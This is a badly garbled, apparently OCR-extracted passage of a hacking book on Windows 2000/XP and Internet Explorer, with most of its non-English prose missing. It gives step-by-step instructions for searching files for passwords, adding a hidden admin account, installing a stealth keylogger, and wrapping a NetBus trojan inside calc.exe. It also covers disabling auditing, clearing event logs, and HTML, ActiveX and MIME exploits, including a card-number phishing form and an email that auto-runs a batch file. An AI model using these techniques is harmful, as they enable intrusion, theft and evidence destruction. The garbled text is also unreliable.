. , - , , , , ( ), , ,
.


- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , - .
.



.
, , - , , . , , Pwltool.
,
,
, (. 1 ). , .
, , , , , ,
,
.

, - , .
, ,
. : , . , ,
,
?

k
, - , , . - ,
, - , , . , , , - ,
, [2].

6.


, - . ,
, ,
? , ,
- , , ,
, .
( Hoover - , ,
, ), ,
.

Windows , , ..
Windows, , Windows,
, FINDSTR
Windows 2000/XP.
, , [3,4] Fondstone Inc., ,
,
-
.

.
,
, , , password, login credit card .
Windows , , ,
FINDSTR, , Windows.

[buck FINDSTR
FINDSTR ,
FINDSTR /?. FINDSTR.
FINDSTR [IB] [/] [/L] [/R] [15] [/I] [/X] [/V] [/N] [/M] [/0] [IP] [/:] [/:]
[/:] [/0:_] [/:] [] [[:][]_[...]]
. FNDSTR /? , :


/L

/R

/S

/1

, .

/X

, .

/V

,
.

/N

, ,

/:

- .

/:

/:

/0:__

(
).

[:][]_

FINDSTR.
password :
FINDSTR /S "password" *.txt
, ,
password, :


FINDSTR /S "password " *.txt


, , password.
, ,
:
FINDSTR/5/:" " *.txt
, /: .
FINDSTR ,
Windows, . , , [3].

flouck cmpok 6 BinText


BinText foundstone_tools
Foundstone Inc. (http://www.foundstone.com) , - , DLL,
. . 6.1 BinText, - Search (), Filter () Help ().
BinText, :
[Screenshot: BinText window (tabs Search, Filter, Help) scanning C:\Test\test.doc with "Advanced view" checked; columns File pos, Mem pos, ID and Text. The strings listed include Administrator, Normal.dot, Microsoft Word 9.0, "this is every big secret", MSWordDoc, Word.Document.8, Root Entry, 1Table and WordDocument. Text size: 444 bytes (0.43K)]

. 6.1. BinText

> Browse () .


> Go! (). BinText 3.00


.
Advanced view ( ) (. 6.1).
. 6.1 File pos ( ) ' . Mem pos ( ) , Windows.
ID , . 0 , .
BinText
, Windows , . , . 6.1
Test.doc, MS Word. , , Sword, .
, - ,
, ? ,
. . , .
, , .
. 6.2 BinText, , WinRAR .
[Screenshot: BinText 3.00 window scanning c:\Test\test.rar with "Advanced view" checked; apart from the file name "testdoc" in the first row, the Text column contains only unreadable fragments; buttons Find and Save]

Puc. 6.2.


, ,
- Test.doc. , Encrypt file names ( ),
. 6.3.
Archiving with password
Enter password

Reenter password for verification

Q Show password
0 Encrypt file names

. 6.. !
, - Test.doc , ,
? BinText

(. . 6.2) Find (). ,
Filter () ,
(. 6.4).
[Screenshot: BinText 3.00 Filter tab. Stage 1: checkboxes for the characters included in the definition of a string (CR, LF, Space, Tab, punctuation marks, 0-9, A-Z, a-z and accented letters), with "Include these characters too", "Clear" and "Restore defaults"; Stage 2: String size (Min text length, Max text length, "Discard strings with ... or more repeated characters"); Stage 3: Essentials ("MUST contain these")]

Puc. 6.4.
Filter () . 6.4 , .


Stage 1 - Characters included in the definition of a string ( 1 , )


, .
Stage 2 - String size ( 2 - ) .
Stage 3 - Essentials ( 3 - )
MUST contain these ( )
.
, , . , , , , MS Office - ..
BinText , , W2RK srvinfo.exe
, regdmp.exe,
Windows 2000/XP.
HKEY_LOCALMACHUNE\
SECURITY\POLICY\SECRETS,
Windows, Windows
[4]. Isadump2.exe (http://razor.bindview.com),
LSA Windows,
Isadump2.exe .
, - . , - - MS Office
W i n R A R ?
, .

k

Windows , , .
MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5. ,
, *******. Revelation
SnadBoy (http://www.snadboy.com).



, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - Off ice Password
.

flakem OfficePassw/ord 3.5


OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5

.

Word
password.doc,
- ?
, Windows,
password.doc, (. 6.5).
- ,
OfficePassword 3.5 :
> * * OfficePassword (Start * Programs * OfficePassword).

OfficePassword
(. . 6.6).

Password
Enter password to open file
C:\test\password.doc

II
OK

Cancel

Puc. 6.5.
Word
I OfficePasswoid 'DEMO'
File

Tools

Options

Help

Select document
You can also drag-and-diop files from Internet Explorer onto this
window.
> (c) 1998-2001 Vitas Ramanchauskas, LaslBil Software <
http://laslbit.conn
"""DEMO Version1""
Register to upgrade to a full-functional version! |

Puc. 6.6.
OfficePassword

> Select document ( )


Windows MS Office.


, Word . ,
MS Word . ,
- OfficePassword 3- .
- , .
> , Select recovery
mode ( ), . 6.7.
(Select recovery mode
Document path: C:\test\passworddoc (Word)
Version
: Word 8.0+
Internal version: 193
v/ord language : Russian (041 9)
Encryption type : Strong
Text size
: 537

-:

rreview

Automatic
OfficePassword automatically selects most suitable rec svery options. Recovery may take a
lot of time (up to several months in case of a long passv ord). About 80% ol all passwords
could be recovered within 48 hours. Use guaranteed re covery otherwise.
User-defined
Adjust settings to optimize search for specific case. (Th s option is for advanced users only.)
Guaranteed recovery
Success is guaranteed! Important: please read the doc jrnentation. Additional fee may apply.
I Click here to learn more

Cancel

| Display help info

Next

Puc. 6.7.
> Select recovery mode ( )
:
Automatic ( ), , Next (), , .
User-defined ( ),
. .


Guaranteed recovery ( ), , , ,
.

, , 24-28
, . , , .
> Next ().
, ,
(. 6.8).
[Fig. 6.8. OfficePassword 'DEMO' message: "Password found: '007' (without quotes). The password has been copied onto the clipboard. Would you like to open the document now?" with Yes and No buttons]
OfficePassword 3.5 ,
, . -. , .
, - ,
.
, , - ,
.

cmpokou ******,
, - ,
, (, ), , ******_
, , , . - , , ,
. ,
.


,
, . , , NetBus
( ,
14). . 6.9
Revelation SnadBoy (http://www.snadboy.com) NetBus NetBus.
[Fig. 6.9. SnadBoy's Revelation over the NetBus "Change Host" dialog for host SWORD-2000: the "Text of Window Under 'Circled +' Cursor (if available)" box shows 007, status "Revelation active", "Length of available text: 3"]


!
Revelation .
. 'Circled+'Cursor ('+')
SnadBoy's Revelation ( . 6.9
Password ()). Revelation,
Test of Window Under Circles and Cursor (if available) (
( )) (
). . 6.9, 007
NetBus Sword-2000,
( ).


( NetBus) , 15
.


- , - , -
, , - .
: .
, 7.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.


- , , , , .
MS-DOS: NET USER < > <> /ADD,
,
NET LOCALGROUP < > < > /ADD,
. . 6.10 .
C:\>net user NewUser 007 /add
The command completed successfully.

C:\>net localgroup Administrators NewUser /add
The command completed successfully.

Puc. 6.10.
NewUser


NewUser
, , .
,
,
.

Autostart
- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
, , 14 15
, .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.


- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 ,
.
Windows NT/2000/XP, ,
, [ |+|[ Ait |+[[Deiete)
IKS
Windows NT/2000/XP. , IKS
,
.


IKS .
Web- iks2k20d.exe , . 6.11.
[Fig. 6.11. "IKS for Windows 2000 Installation" dialog with tabs Standard Install, Stealth Install and Uninstall. The Standard Install tab states that a program directory is created (Install Directory: C:\Program Files\iks), an icon to the log file viewer is placed on the desktop, no file renaming (stealth features) takes place, and administrator rights are needed to install.]
Install Now ( ) -
. IKS
. , IKS , iks.sys,
- ( Diilvinw - Binary Log Translator for IKS
- settings
.
Use Notepad
0 Fitter Out Arrow Keys
Translate to Text Only
, D Filter Out Ctrl and Alt Keys

Filter Out F1 to F1 2 Keys
D Clear Binary Log Upon Exit
dataview.exe, Filter Out All Other Function Keys
1 El Clear Text Log Upon Exit
. 6.12.

Go! ()
, . . 6.12
,
,
.

[Fig. 6.12. DataView (Binary Log Translator for IKS) dialog: fields "Import Binary Log From" (C:\WINNT\iks.dat) and "Save Text Log To", with Browse... and Go! buttons]


, IKS , . iks.sys KOpeHb_CMCTeMbi/system32/drivers,


( Regedt32 . 6.13).
[Fig. 6.13. Registry Editor (Regedt32), "HKEY_LOCAL_MACHINE on Local Machine" window, showing a key's Start and Type REG_DWORD values]

(,
The Cleaner, ).
IKS, Stealth Install
( ) (. 6.11)
- , calc.sys,
(, -
- ).
IKS
. 007 Stealth
Monitor, Web-, , ,
. -
Windows,
- , , notepad.exe.

Sanyck
, -
Windows.
,
, , ,
. , 14 15.


Ckpbimue
,
.
, elitewrap.exe
(http://www.holodeck.f9.co.uk/elitewrap), .
,
.
Windows
, elitewrap.exe, a
, .. ,
.
. , ,
calc.exe NBSvr.exe - NetBus.
C:\>elitewrap
eLiTeWrap 1.04 - (C) Tom "eLite" McIntyre
tom@holodeck.f9.co.uk
http://www.holodeck.f9.co.uk/elitewrap
Stub size: 7712 bytes
Enter name of output file: explorer.exe
Perform CRC-32 checking? [y/n]:y
Operations:
1 - Pack only
2 - Pack and execute, visible, asynchronously
3 - Pack and execute, hidden, asynchronously
4 - Pack and execute, visible, synchronously
5 - Pack and execute, hidden, synchronously
6 - Execute only, visible, asynchronously
7 - Execute only, hidden, asynchronously
8 - Execute only, visible, synchronously
9 - Execute only, hidden, synchronously
Enter package file #1: calc.exe
Enter operation: 2
Enter command line: calc
Enter package file #2: nbsvr.exe
Enter operation: 3
Enter command line: nbsvr
Enter package file #3:
All done :)
explorer.exe. Windows 2000
explorer.exe, calc.exe
NetBus. , , , ,
NetBus .
, elitewrap.exe , ,
, .
EliteWrap ,

.

, ,
- ,
, ,
. ,
[3], , , - .
- .
.

? ,
, , - . , . ,
, .
, , ,
.

7.

Cokpbimue
- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 ,
50%
, - , , .

, ,
,
. , ,- , , . ,
( ).

, - ( ).
,

. , - , , , .
.


acnekma
, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
,
[10], (, )
, - ,
- privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .

. , Web-
, Web, .
, , ,


(, ).


, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .

Fu6kue u gucku
. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
(Folder Options) Windows. * (Tools * Folder Options) (. 7.1).

[Fig. 7.1. Windows Folder Options dialog]
- Word
(Delete) Windows ,
. . 7.2,
, Word,
, ,
.

[Fig. 7.2. Explorer window listing temporary files such as ~WRL0004.tmp, ~WRL1120.tmp and ~WRL3531.tmp]


, - ., .WBK, , -$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.

Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmltfClndisk).

nanok
, , ,
. , .

, ,
.
- , , . ( 100%)
.
/

. 7.3 Clean Disk Security 5.01


(http://www.theabsolute.net/sware/index.htmltfClndisk),
, ( ).
Clean Disk Security 5.01
Erase fully ( ).
-
, , ( FAT NTFS).
,
, . Windows, Windows, Temp
( , , ) .
-,
, ,
(cookie). , (. 7.3).


[Fig. 7.3. Clean Disk Security 5.01]



. 7.3, :
Simple () 6 ,
.
; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . .
, ( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01
,
,
.
, [10]. -
, : (UPS);


. , ,
.
,
.

Onucmka
, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.

. , ,
NTFS.


, ,
, -
. , - - Web- .
, , .
.
, ,
.

, , .


. ,
.

, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
,
- ,
!!!


Web- ,
HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 7.4,
, Web-,
IP- .
[Fig. 7.4. "Analyze Your Internet Privacy" page at http://www.privacy.net/analyze/ in Internet Explorer. It reports the browser type and operating system (Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)) and all information sent with the request: the Accept, Accept-Language, Connection, Host, User-Agent, Cookie, Via (proxy.iptelecom.net.ua:3128, Squid), X-Forwarded-For and Cache-Control headers.]

, ( )
Whols,
1,
.
, - , IP- . Web-


Web- , IP- -
...
, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 7.5).
[Fig. 7.5. Anonymizer.com "Online Privacy Services" page in Internet Explorer, with a URL entry field and a Go button]

- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .

Proxy servers
Web -, - (Proxy server)
(. 7.6).


[Fig. 7.6. Proxy server settings dialog; address field "www.anonymize", port 8080]
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .


Cokpbimue amaku
, , , ,
, , , .
, , , 6 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, ,
, .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , ,
elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).

Windows, .
, .
,
, , explorer.exe,


Windows
Windows.

, EliteWrap, 6.
( Rootkit ). ,
, .

.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].


, ,
, -
, .
, / .

Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :
C:\Auditpol>auditpol \\ComputerName /disable
Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
System                    = No
Logon                     = No
Object Access             = No
Privilege Use             = No
Process Tracking          = Success and Failure
Policy Change             = No
Account Management        = No
Directory Service Access  = No
Account Logon             = No

//ComputerName - , /disable
. auditpol.exe - , , ,
, ( auditpol /? ).

Omicmka

Windows 2000/XP :
> (Start)
.* (Settings Control Panel).
>- (Control Panel)
(Administrative Tools).
> (Event Viewer).
Event Viewer ( ) (. 7.7).
[Fig. 7.7. Event Viewer (Local) window listing the Application, Security and System logs; the log menu offers Open Log File..., Save Log File As..., New Log View and a command that deletes all records in the log]


> (Security Log);


.
> Clear all Events ( ). , . 7.8,
.
[Fig. 7.8. Event Viewer prompt: "Do you want to save "Security" before clearing it?" with Yes, No and Cancel buttons]
> (No), . .
,
! ,
-
. , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
, , Windows NT 4,
Windows 2000. .
C:\els004>elsave -s \\ComputerName -

-s , -
. , . elsave /? ,
.
, elsave.exe
. elsave.exe Windows ( (Start), AT MS-DOS). System, .

Ckpbimue ,

, , . - -


, , .
.

Cokpbimue
,

(. 7.9).
[Fig. 7.9. "nc.exe Properties" dialog, General tab: type Application, location C:\test\netcat, size 58.0 KB (59,392 bytes), size on disk 60.0 KB (61,440 bytes), with the Read-only and Hidden attribute checkboxes]


, , Windows
.

Ckpbimue
,
, Windows. ,
. Windows 2000/XP Documents and Settings\User\Start Menu\Programs\Startup
. , -


-
, , .
, Windows
, ,
, , The Cleaner
(http://www.moosoft.com).
, EliteWrap 6.
- .

Rootkits
, - UNIX [3]. , , ,
,
. , ,
, .
Windows NT/2000/XP
, ROOTKIT (http://www.rootkit.com)
. , , ..
NTKap, , ACL (,
4), . ,
, , Windows NT/2000/XP
. ROOTKIT COM

. , ....


-
( , - ).
, , . , , ,

, .
- ! 50%
( - !)
- !
- , , [9]. , , Norton Personal Firewall, PGP Desktop Security .
, ,
, .

3.

XakuHz
-
8.

XakuHg 1/
, ,
, ,
. , ,
,
, , .
, 90- , .
, , .
4 ,
, ,
.
, ,
, TCP/IP.
- ,
.
- , , .
,
.
, , ,
(, ).
, . ,


, , , Word ..,
, , ,
.
WWW (World Wide Web - ), Web (). Web - , Web . - 1961 , Web 1992
.
, , . Web - Web ,
, Web.
Web .
Web, Web URL (Uniform
Resource Locator - ),
Web.
,
Web HTTP (Hyper Text Transfer
Protocol - ).
, Web,
HTML (Hyper Text Markup Language -
).
,
: , , ,
- HTML CGI HTTP. ,
.
Web , , Web, , - , , - 1 Web
.
Web , , Web - HTML Web,
( browser, , -


, ),
Web Web-.

kog HTML
HTML - Web,
Web,
, , , , , , , , .
, HTML , Web, ,
Internet Explorer (IE) Netscape Navigator (NN).
: Web - , HTML Web , , ,
HTML, , - Web? -
HTML? . ( )
, , Web-.


, DoS , Web . , ,
Web,
, .
(),
JavaScript MainPage.html , HTML
8.1.
8.1.
HTML Web-
<HTML>
<SCRIPT LANGUAGE="JavaScript">
generation();
function generation() {
  var d = 0;
  // Endless loop: every pass opens this same page again in a new window
  while (true) {
    a = new Date;
    d = a.getMilliseconds();
    window.open("MainPage.html", d, "width=250, height=250");
  }
}
</SCRIPT>
</HTML>

IE 5 IE 6
.

HTML, , . Windows 2000/XP
IE 5 IE 6 HTML,
.


- . , 8.2
... X (
).
8.2.
HTML Web-
<HTML>
<SCRIPT language=JAVASCRIPT>
var p = external.... ;
</SCRIPT>
</HTML>

HTML 8.2 IE 5
var p 8.2.

( [3], [10]). , ,
-
HTML .

Sanyck
[3] HTML,
<OBJECT> CLSID (
). 8.3.
HTML, .


8.3. HTML
<HTML>
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
        CODEBASE='c:\windows\system32\calc.exe'>
</OBJECT>
</HTML>

8.3 IE 6 ,
. 8.1.
[Fig. 8.1. Internet Explorer window ("Opening page") with the Windows Calculator started on top of it]

C:\Windows\system32\calc.exe, , .

Web- ,
JavaScript, HTML- Web-, . ,
IFRAME, Web- .
8.4 HTML, ,
C:\security.txt.


8.4.
Web-
<HTML>
<BODY>
C:\security.txt <BR>
<IFRAME id=I1></IFRAME>
<SCRIPT event=NavigateComplete2(b) for=I1>
alert(" : \n"+b.document.body.innerText);
</SCRIPT>
<SCRIPT>
I1.navigate("file://c:/Security.txt");
setTimeout('I1.navigate("file://C:/Security.txt")',1000);
</SCRIPT>
</BODY>
</HTML>
8.4 IE 5 IE 6
, . 8.2.
[Fig. 8.2. Internet Explorer window showing "C:\security.txt"]
. 8.2, security.txt -
- Web-. , , - , JavaScript
.
Web- NavigateComplete2,
[3].



ActiveX ,
HTML- Web- .
Web- , ActiveX, . , Web-,
ActiveX, ActiveX
, .
ActiveX Microsoft - ActiveX ,
ActiveX
(, Verisign Corporation). Web-
, ActiveX - ,
ActiveX.
, ,
, ,
(
http://www.guninski.com), .
- , ActiveX , .
ActiveX ,
http://www.guninski.com. ,
- .

ActiveX
Windows
ActiveX. Web, Web-,
<OBJECT> ActiveX, Windows ActiveX ActiveX, Web.
, ,
ActiveX. - .
ActiveX Windows safe
for scripting ( ),


Web. , ActiveX,
,
(Georgi Guninski) . ,
ActiveX, , Scriptlet Eyedog, ,
IE 4.
http://www.guninski.com HTML- ( - , ), Scriptlet , Eyedog
Windows . IE 4 Windows 9x.
Windows 2000/XP ActiveX, , IE 5 IE 6 [3]. , Windows 2000/XP , , , . [3],

- ActiveX
. , , , , .
8.5 HTML,
, ,
. ( HTML
, ,
http://www.guninski.com).
8.5.
<HTML>
<SCRIPT>
alert(" : :\\secret.txt\BaM \ " )
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObject(":/secret.txt", "htmlfile")');
setTimeout("alert(x.body.outerHTML);", 2000);
</SCRIPT>
</HTML>

8.5 IE 6 ,
. 8.3.


[Fig. 8.3. Microsoft Internet Explorer message box showing the contents of security.txt wrapped in <BODY><PRE> ... </PRE></BODY>]
, security.txt ,
security.txt Web-,
,
. , Windows, ,
.
- .
, (cookie),
Web- Web.

kyku
- .
-
, , , ,
- ,
Web.
, - , .
, ,
, SpyNet (. 17),
Web-, .

PEACEFIRE

http://www.peacefire.org/security/iecookies

JavaScript,
,
, . 8.4.

[Fig. 8.4. Peacefire.org page "Internet Explorer cookies are world-readable": a field for entering a domain (e.g. "yahoo.com" or "hotmail.msn.com") and a "Click to view cookie" button that opens a page displaying the visitor's cookie for that domain]

.
, Web-
,
- . Javascript ,
. , , .
, Web-
http://www.peacefire.org/security/iecookies.
Javascript, Click to view cookie
( ), , ,
. , ,
,
.

flepekpecmHbie
JHTML-,
Web, Web- . Web CGI-,
Web-, .
8.6.
8.6. HTML

<HTML>
<BODY>


, <
HREF="http://WWW.AnySite.com/cgi/Hacker. 1?=<81>
</81>" </>
</BODY>
</HTML>

Web-
Comment, , ,
. , , , ICQ, - ,
. Web, - .
, . ( CGI- ).

Web-caumoB
Web, , , - Web- . ,
Web- ActiveX, .
,
,
, , , , -,
- ..
- , ,
. ,
- .
- ,
- Web-,
. ,
,
.
, Web - . , Windows
Web- Microsoft NetBus.


Web-,
.
Web- ,
. 8.7
HTML, .
8.7. HTML
<HTML>
<HEAD>
<1> Bubliki&Baranki BCE!!!!!</TITLE>
</HEAD>
<BODY>
<SCRIPT TYPE="text/javascript">
function falsify() {
z=window.open("about:Internet-Mara3HHBubliki&Baranki");
z.document.open();
z.document.write
("<1>

BubHki&Baranki</TITLExHl>3aKa3

VirtualAir</Hl>
<FORM
ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber'
=5- =1<>
no4Tbi<BR><INPUT =11>
<><11
TYPE=textxBRxINPUT
TYPE=checkbox
]=>

VirtualAir<P>
<INPUT
TYPE=submit
=''/(>");
z.document.close();
}
</SCRIPT>
<H1 ID="header">ToBap VirtualAir</Hl>
. Bubliki&Baranki VirtualAir, ! <
HREF="javascript:var
a;"
onclick="falsify()"
onMouseOver="window.status=
'http://www.Bubliki&Baranki.com'; return true;" onMouseOut= "window.status="">
, </> Bubliki&Baranki!
</BODY>
</HTML>
8.7 IE 5 , . 8.5.


[Fig. 8.5. Rog&Kopito Web page in Internet Explorer advertising VirtualAir from Bubliki&Baranki; the status bar shows http://www.Bubliki&Baranki.com]


http://www.Bubliki&Baranki.com -
Rog&Kopito . Web- Rog&Kopito

Bubliki&Baranki, Web- Rog&Kopito
. (, ,
.) , Web-
Bubliki&Baranki. Web-, . 8.6.
[Fig. 8.6. Window titled "Bubliki&Baranki" in Internet Explorer with the VirtualAir order form]


Web- . 8.6
.
CGI- GetCardNumber,
Web-, Rog&Kopito:
<FORM ACTION='http://www.AnyHackerSite.com/cgi/GetCardNumber' METHOD=post>

-
(Address) ,
,
, , .
IE Address Javascript.
URL. HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .
- ?
, , SSL ( TSL)
Web-.

Hacking SSL
SSL (Secure Sockets Layer - ) ,
Web.
, .. , -
, . IE , , SSL,
http:// https://.
Web,
, .


, - . , /
.
- : - Web
. -, , , ,
Web- SSL-. , ,
, . -,
Web,
128- ( , D). IE ,
IE 56-
,
Web-.
- ? : . , . , [3]
SSL, IE 4: SSL , . ,
, IE, IE, .
, [3].


, , ,
, Web . .
, , , Web.
,
Web-
. .
-,
,


-
, , .
.
, ,
.
Windows 2000/XP, 14.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .

Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.

9.

Xakutig
- ,
. , ,
-
, , .
, . ,
,
, Web-. , .

kogoM
, Web-. WWW,
, ,
, 1, , , . , - , ... , ,
, .
[3]
. ,
, Web- , . ,
, . . .

1
FIDO. mail ().


.
: _@_, _ - () , _ . , , , .
SMTP,
POP IMAP, , ,
TCP/IP.
SMTP (Simple Mail Transfer Protocol -
) .
POP (Post Office Protocol - ) - .
IMAP (Interactive Mail Access Protocol -
) - ,
POP, .
:
, , , vasia@email.com
, . ( ).
, , , vasia,
, , petia , ,
petia@post.com, POP ( IMAP) email.com
( ).
email.com .
:

, petia.
, .

,
email.com DNS
post.com petia (
).


petia POP ( MAP) , , .


, .

XakuH2
,
: -, ; , . POP 3
() , . - SSL/TSL (
). -
, (
17).
- ,
SMTP. , , SMTP, . (, Outlook Express), , , , .
.

,
.
, , ,
, ,
.
, ,
. ,
- .
,
,
,
. , .

, .
- .. ,
, .
- , ,
,
, ,
IE, (
). - , ,
, ,
, , .
- . , , ,
-, . ,
-
, , , ,
Windows, ,
, .

, -
.
, .
, .., ,
, , ,
, .


RFC 2822.
, ASCII . ,
( ), , ASCII ( ). <CRxLF>, ( 13) ( 10).
. .
:
_:
:


Subject:
, (Subject) () . , , :
Subject:



...
- 998 ,
78 .
, , .

From

, :
vasia@email.com, : "Vasia Lohov " (vasia@email.com).

Reply

-
, From.

, , .., From .

Subject

Date

, , Sat.16 Jun 2003 15:34:17+1000

Message-ID

, , :
<3.0.4.44.30445445754533.0035@email.com>

Received

, .

, , Outlook Express,
-
, . ,
.



.
. - TCP/IP Ethernet, Windows 2000/XP. :
Windows 2000 Server Sword-2000 - 1.0.0.1
Windows XP AIex- IP- 1.0.0.5
Windows 2000 1-1 IP- 1.0.0.7
sword.net,
: Sword-2000 sword2000.sword.net., AIex- - alex-3.sword.net,
1-1 - alex-1 .sword.net. 1-1 AIex- :
1-1 kolia@alex-1.sword.net,
AIex- - , petia@alex-3.sword.net.
, - , - .
, , , . ,

. ,
.
-
, .
9.1 ,
JMail 5.01.
9.1.
Received: from alex-1.sword.net [1.0.0.7] by alex-3.sword.net with ESMTP
  (SMTPD32-5.01 EVAL) id A4A7502B6; Thu, 16 Jan 2003 14:25:11 +0200
Received: from alex-1 [1.0.0.7] by alex-1.sword.net
  (SMTPD32-5.01 EVAL) id A76080152; Thu, 16 Jan 2003 13:28:32 +0200
Message-ID: <008601c2bd52$6682eee0$07000001@sword.net>
From: "kolia" <kolia@alex-1.sword.net>
To: <petia@alex-3.sword.net>
Subject: Congratulations
Date: Thu, 16 Jan 2003 13:28:32 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
X-RCPT-TO: <petia@alex-3.sword.net>
X-UIDL: 7
Status: U

Happy New Year!
, , - , Content-Type, , ( ).
(Multipurpose Internet Mail
Extensions - ).
MIME ,
.

MIME
, ,
, , , , MIME
: Content Type:, Content-Transfer-Encoding: Content-Disposition:. MIME MIME-Version:, MIME,
- 1.0,
:
MIME-Version:1.0
Content-Type :
Content-Type: /; =; ...
/ ,
MIME MIME-. , MIME- .


text/plain
text/html

( HTML). :
1=_/)(/7_/
, charset=koi8-r ;
charset
us-ascii, .. ASCII.

image/jpeg
image/gif

image/gif

audio/x-realaudio

() , , Content-Type:
video/mpeg

Content-Type:

video/mpeg
video/quicktime

, , Content-Type: video/mpeg

application/postscript
application/msword
application/zip
application/octetstream

( application)
, ,
octet-stream --
:
Content-Type: octet-stream

multipart/mixed
multipart/related
multipart/alternative

multipart - MIME-, , ,
. mixed, related, alternative , , , , .

Content-Type-Encoding :
Content-Type-Encoding:
,
, .
7bit - us-ascii, 8-bit - ,
binary - , quoted-printable -
, base64 - ,
Base64 (RFC-2045).
Content-Disposition
, , , .
:
Content-Disposition: inline; filename="image.gif"


inline , , filename
, - .
attachment , .
, , , , .
.

omnpaBka
,
MS-DOS, . ( ) , Outlook Express.
, . , 9.1,
X-Mailer: , , ,
Outlook Express 5.00. , ,
, - 5.00 ,
, .
(Notepad) 1-, 9.2,
Attack-hello.txt.
9.2.
-
hello sword-2000.sword.net
mail from: <petia@alex-3 . sword.net>
rcpt to: <kolia@alex-l . sword. net>
data
subject: Attack
MIME-Version: 1.0
Content-Type:
multipart /related;
type="multipart/alternative11;
boundary = " 1 "

Content-Type: multipart/alternative; boundary =" 2

--2
Content-Type: text/html; charset="iso-8859-l"
Content-Transfer-Encoding: quoted-printable


Content-Disposition: inline;
<HTML>
<HEAD>
</HEAD>
<BODY >

<IFRAME src=3Dcid:THE-CID height=3DO width=3DO>


This message uses a character set that do not supported
by the Internet Service. Please disregard. <BR</IFRAME>
</BODY>
</HTML>

Content-Type: audio/x-wav; name= "hello. bat"


Content-Transfer-Encoding : quoted-printable
Content- ID: <THE-CID>
echo off
dir c:\
echo "Your system has a problem! "
pause

quit

,
MIME- , 9.2, -1 -2 .
MIME .
- SMTP, SMTP, - , ,
. hello ,
sword-2000.sword.net. mail from , , rcpt to
, 9.1. Received:. data, .


9.2 ,
1, MS-DOS
: .
,
HTML, IFRAME
:
<IFRAME src=3Dcid:THE-CID height=3DO width=3DO>
This message uses a character set that do not supported
by the Internet Service. Please disregard.<BR</IFRAME>

src=3Dcid:THE-CID, , Content-ID: <THE-CID>.


, - .
- MS-DOS:
echo o f f
dir c : \

echo "Your system has a problem!"


pause
- audio/x-wav - ..,
,
MS-DOS. , ,
5.00 ( 5.50 6!)
, , ,
!
. , MS-DOS:
type attack-hello.txt | nc -vv sword-2000.sword.net 25

- . (http://www.atstake.com), , netcat . ; , netcat attack-hello.txt


SMTP- sword-2000.sword.net, 25.
, , , , , MS-DOS
(. . 9.1).

[Fig. 9.1. Outlook Express with an MS-DOS window opened by the message: "echo off", a directory listing of C:\ and the line "Your system has a problem!"]
, MS-DOS,
, - ,

:\ Your system has a problem ( ). , ,
-
MS-DOS!
, ,
. , -
, , ,
. , - - , -.


,
: -
(, ) , .
- -
.


TFTPD32, - .
- netcat.
MS-DOS, , netcat, . .
attack-tftp.txt MIME-, 9.3.
9.3.

hello alex-l.sword.net
mail from: <petia@alex-3 .sword. net>
rcpt to: <kolia@alex-l. sword. net>
data
subject: Attack
MIME- Version : 1.0
Content-Type:
multipart/related;
